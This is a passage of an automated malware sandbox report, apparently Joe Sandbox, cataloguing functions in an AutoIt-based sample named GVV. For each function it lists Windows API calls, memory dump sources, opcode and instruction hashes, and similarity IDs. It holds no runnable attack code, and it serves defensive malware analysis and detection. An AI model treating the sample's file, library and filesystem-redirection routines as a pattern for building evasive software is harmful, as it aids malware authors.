                • Opcode Fuzzy Hash: 42b822d1bb98353b1dbf35bf5ec2d9004d0f941ac902fa034fde39f65cc01033
                • Instruction Fuzzy Hash: 4522BC70608251EFC718DF14E890B2ABBF1BFA5304F14896DF49A8B361D771E861CB82
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00186EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 00186F6B
                  • Part of subcall function 00114ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114EFD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LibraryLoad_wcslen
                • String ID: >>>AUTOIT SCRIPT<<<
                • API String ID: 3312870042-2806939583
                • Opcode ID: acfcb9fc22614fa7cb429ed201c05ad039d34105a4d014d118abbb19ae5e767e
                • Instruction ID: 7b44552034dbd18217ebe48b0a0bf14231ad125ad47c3d83a2df9de3e7f2fa59
                • Opcode Fuzzy Hash: acfcb9fc22614fa7cb429ed201c05ad039d34105a4d014d118abbb19ae5e767e
                • Instruction Fuzzy Hash: DCB175311082018FCB18FF24D4919AEB7E5BFA4314F54896DF596972A1DB30EE85CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00112DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                Download Yara Rule
                APIs
                • GetOpenFileNameW.COMDLG32(?), ref: 00152C8C
                  • Part of subcall function 00113AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00113A97,?,?,00112E7F,?,?,?,00000000), ref: 00113AC2
                  • Part of subcall function 00112DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00112DC4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Name$Path$FileFullLongOpen
                • String ID: X
                • API String ID: 779396738-3081909835
                • Opcode ID: 3c1d9fd470641ff82ab34c65eaa49ff9402134d32c274e59cb3ecb6a740c83fb
                • Instruction ID: 4888aeeb07dbd3e2c9e029f4cfb657da4fcca78ea9021df8205ce2e12a2b9660
                • Opcode Fuzzy Hash: 3c1d9fd470641ff82ab34c65eaa49ff9402134d32c274e59cb3ecb6a740c83fb
                • Instruction Fuzzy Hash: 4E21D571A002589FCB45EF94D845BEE7BF8AF59304F00406AE415BB241DBB45A8D8FA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00182557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __fread_nolock
                • String ID: EA06
                • API String ID: 2638373210-3962188686
                • Opcode ID: cb42305d0e9c9e3e45e5c945153b2b8e9fe79510656242ec9ed40b956c780477
                • Instruction ID: 0bd5fb7907357330565441609877cb6cd3d084a0e1c3bb213c53754fec35516d
                • Opcode Fuzzy Hash: cb42305d0e9c9e3e45e5c945153b2b8e9fe79510656242ec9ed40b956c780477
                • Instruction Fuzzy Hash: 8101F5729442187EDF19D7A8C816FEEBBF89B15301F00459AE192D21C1E6B4E7088B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00115745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0011949C,?,00008000), ref: 00115773
                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0011949C,?,00008000), ref: 00154052
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 1a27d2a93b7ad9c932403c4c4e601c14a090eeeb4a8502bd3b402ec1d17f5280
                • Instruction ID: e9a126d4b0b6552beb0cc4368c5868da68f5d17b85ce30650c1bf1a8411dbccf
                • Opcode Fuzzy Hash: 1a27d2a93b7ad9c932403c4c4e601c14a090eeeb4a8502bd3b402ec1d17f5280
                • Instruction Fuzzy Hash: F5018030245625F6E3355A2ACC0EFD77F99EF427B4F108210FAAC5A1E0CBB45894CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0011B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                Download Yara Rule
                APIs
                • __Init_thread_footer.LIBCMT ref: 0011BB4E
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Init_thread_footer
                • String ID:
                • API String ID: 1385522511-0
                • Opcode ID: 940710920b1db51594ebc4e038a361ea2e8e429de41287e50712be95b7397ec9
                • Instruction ID: deb100187017e361a3147853c9b8d37930bcd4dea28aaede2e5709b35df3774f
                • Opcode Fuzzy Hash: 940710920b1db51594ebc4e038a361ea2e8e429de41287e50712be95b7397ec9
                • Instruction Fuzzy Hash: AD32AB74A082099FDB29CF54C8E4AFEB7B9FF48304F158069E905AB291C774ED91CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A810D0 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 01A808E0: GetFileAttributesW.KERNELBASE(?), ref: 01A808EB
                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01A81235
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: AttributesCreateDirectoryFile
                • String ID:
                • API String ID: 3401506121-0
                • Opcode ID: bc432da4606b849b23b615438a69dff05f1a50638b5a920a7c8e37ad84b3aaa6
                • Instruction ID: cbe158b2df39b50ad53513c874fa4b607f17dfea23a78f64fc0618b9090b17c9
                • Opcode Fuzzy Hash: bc432da4606b849b23b615438a69dff05f1a50638b5a920a7c8e37ad84b3aaa6
                • Instruction Fuzzy Hash: FB518131A1020996EF14EFA4D854BEF7379FF58300F00456DE60DE7290EB7A9A85CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00114ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00114E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00114EDD,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E9C
                  • Part of subcall function 00114E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00114EAE
                  • Part of subcall function 00114E90: FreeLibrary.KERNEL32(00000000,?,?,00114EDD,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114EC0
                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114EFD
                  • Part of subcall function 00114E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00153CDE,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E62
                  • Part of subcall function 00114E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00114E74
                  • Part of subcall function 00114E59: FreeLibrary.KERNEL32(00000000,?,?,00153CDE,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E87
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$Load$AddressFreeProc
                • String ID:
                • API String ID: 2632591731-0
                • Opcode ID: dcca50b4d45fdec5f081a1a6d7b386aa34b014ce784af7ed965066f19da93a1a
                • Instruction ID: 5cb87280bfdfbcfc7c9194a180292ca591bfd75f45212574b9565e47c16767d7
                • Opcode Fuzzy Hash: dcca50b4d45fdec5f081a1a6d7b386aa34b014ce784af7ed965066f19da93a1a
                • Instruction Fuzzy Hash: 60112731600206ABCF18BB64DC02FED77A59F60B10F10843EF552AA2C1EF759A85D790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00148402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __wsopen_s
                • String ID:
                • API String ID: 3347428461-0
                • Opcode ID: 94f13716b65728dfd6692390d2456600459d137e505b704aeae29095c9a402e4
                • Instruction ID: abf4665fcd5f2aee132ce14921e4a1ffc978ade302d7f843cd47d3fa316f9672
                • Opcode Fuzzy Hash: 94f13716b65728dfd6692390d2456600459d137e505b704aeae29095c9a402e4
                • Instruction Fuzzy Hash: 8411187590410AAFCB05DF58E941A9E7BF5EF48314F154059FC08AB312DB31DA11CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00119A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                Download Yara Rule
                APIs
                • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0011543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00119A9C
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: dac1a424f433aacd6d6be122dd0b7e00c35e7c09e6e5a06634b9bfefbb097e6e
                • Instruction ID: b1862377eff7ca47728dd880b183b59596ceb9bae658df8e887ed385c211268a
                • Opcode Fuzzy Hash: dac1a424f433aacd6d6be122dd0b7e00c35e7c09e6e5a06634b9bfefbb097e6e
                • Instruction Fuzzy Hash: BE114C31204B059FD728CF05E890BA6B7F9EF44754F14C42DE5AB8BA51C771B989CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0013E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                • Instruction ID: bedcf0782a71e7d8b631b8f7356dfbfe6c55bcf5e0c00dc08e1183267278cfbb
                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                • Instruction Fuzzy Hash: 3AF0C872511B14D7D7313A6A9C06B9B37D89F72335F110719F825931E2DB74D8028AA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00143820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e142e0cab25f8574ec04079af9b1e72137fcc82864755bf5347d2a67a06175b3
                • Instruction ID: 5d956d73bfb088b60af83cb995b4b03fdbdd6131b58f07c30ed3f834020a00b7
                • Opcode Fuzzy Hash: e142e0cab25f8574ec04079af9b1e72137fcc82864755bf5347d2a67a06175b3
                • Instruction Fuzzy Hash: 06E09B31501226A7E73126B79C05B9BB749AF527B0F150335BC35969F1DB21ED0185E1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00114F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                Download Yara Rule
                APIs
                • FreeLibrary.KERNEL32(?,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114F6D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID:
                • API String ID: 3664257935-0
                • Opcode ID: b26e7104b4fe88e26bc9580ae7aede89cfc26c46770ce59b4ff42a5b11cb10db
                • Instruction ID: 53dd77e8029383c802beaf4ef75e9dc61cb1d0433c27be2250aafc0b9cc3ca0d
                • Opcode Fuzzy Hash: b26e7104b4fe88e26bc9580ae7aede89cfc26c46770ce59b4ff42a5b11cb10db
                • Instruction Fuzzy Hash: CCF03971105752CFDB3C9F68D4908A2BBE4EF15729324897EE1EA86621C7319889DF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00112DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                Download Yara Rule
                APIs
                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00112DC4
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LongNamePath_wcslen
                • String ID:
                • API String ID: 541455249-0
                • Opcode ID: d293ef468bcdae7f62d0a7d26c9c80960e6fef2360ca3a3e429aa36173645bca
                • Instruction ID: c05a51cdea394877f294e4a451f9bf4a106f98ab7d16a4eb79e17ddfeef9cb3d
                • Opcode Fuzzy Hash: d293ef468bcdae7f62d0a7d26c9c80960e6fef2360ca3a3e429aa36173645bca
                • Instruction Fuzzy Hash: 61E0CD726041245BC71192589C05FEA77DDDFC8790F050072FD09D7248DA60ADC48590
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00182693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __fread_nolock
                • String ID:
                • API String ID: 2638373210-0
                • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                • Instruction ID: b55ec26d20705294337f78925948a076da7a3742a874316c344505f4a1de1df5
                • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                • Instruction Fuzzy Hash: 06E048B06097005FDF396A28A8517B677D49F49300F10045EF59B83252E67268458B4D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00112B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00113837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00113908
                  • Part of subcall function 0011D730: GetInputState.USER32 ref: 0011D807
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00112B6B
                  • Part of subcall function 001130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0011314E
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                • String ID:
                • API String ID: 3667716007-0
                • Opcode ID: cb5834c510608a8ca93a705cbabb9840f6bcc3d4223caccc9fcab974fa84fc42
                • Instruction ID: 6a55a68b2c481f762f31560d8610aba0251fd2a3b03327786d43e542672d0f49
                • Opcode Fuzzy Hash: cb5834c510608a8ca93a705cbabb9840f6bcc3d4223caccc9fcab974fa84fc42
                • Instruction Fuzzy Hash: 1DE0863130424817CA0CBB75A8525EDB7999BF5355F40153EF152472A2CF7489C54352
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A808E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?), ref: 01A808EB
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                • Instruction ID: 9573bdbccc5388c3ebec6834102df7e49d85f9b3f59a45f71379948ba53ab7f8
                • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                • Instruction Fuzzy Hash: C8E08C71A1520CEBEB20EBFC8A08AA977A8DB04320F004654F91AC3280D5308A489654
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A808B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?), ref: 01A808BB
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                • Instruction ID: c5169e7b3e3cc8849845eae3988e20fe5e4d60d137797fc4eb4280ff08f609d6
                • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                • Instruction Fuzzy Hash: 10D0A73191620CEBCB10DFB89D04ADA77B8DB04320F004754FD15D3281D6319A849790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0015039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,00000000,?,00150704,?,?,00000000,?,00150704,00000000,0000000C), ref: 001503B7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 14eda14a6c6617d2d9ab3575a7f79c759f57c02991f5691edb20d1254360c044
                • Instruction ID: d831e0fcdced6aed2031b2f963cf1f805684a1f77187012afdf792bcca9d27c2
                • Opcode Fuzzy Hash: 14eda14a6c6617d2d9ab3575a7f79c759f57c02991f5691edb20d1254360c044
                • Instruction Fuzzy Hash: 33D06C3214010DFBDF029F84DD06EDA3BAAFB48714F014000BE1856020C736E861AB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00111CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                Download Yara Rule
                APIs
                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00111CBC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: InfoParametersSystem
                • String ID:
                • API String ID: 3098949447-0
